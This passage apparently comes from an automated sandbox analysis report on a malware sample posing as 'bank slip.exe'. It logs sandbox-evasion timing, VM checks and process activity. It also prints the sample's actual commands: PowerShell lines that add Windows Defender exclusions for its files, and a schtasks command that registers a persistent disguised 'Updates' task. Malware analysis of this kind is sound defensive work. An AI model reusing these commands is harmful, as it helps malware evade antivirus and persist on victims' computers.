                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeMemory allocated: 7850000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeMemory allocated: 8850000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeMemory allocated: 89E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeMemory allocated: 99E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 1490000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 3240000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 3060000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 690000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2340000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 4340000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\bank slip.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4998Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4645Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 351Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2761Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2108Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3217
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 727
                        Source: C:\Users\user\Desktop\bank slip.exe TID: 6196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep count: 4998 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep count: 172 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe TID: 7592Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 7916Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 8140Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\bank slip.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99844Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99733Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99625Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99515Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99401Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99280Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99172Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99052Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98878Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97594Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97269Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97141Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97007Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96839Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96714Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96484Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96375Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96156Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96047Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95827Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95719Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95609Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95500Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95390Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95281Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95172Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95062Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94950Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99748
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99634
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99521
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99097
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98943
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98812
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98689
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94171
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94062
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93843
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93721
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93484
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93374
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93265
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93154
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                        Source: RegSvcs.exe, 00000009.00000002.2112938225.0000000006270000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3252060777.00000000063B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeQueries volume information: C:\Users\user\Desktop\bank slip.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
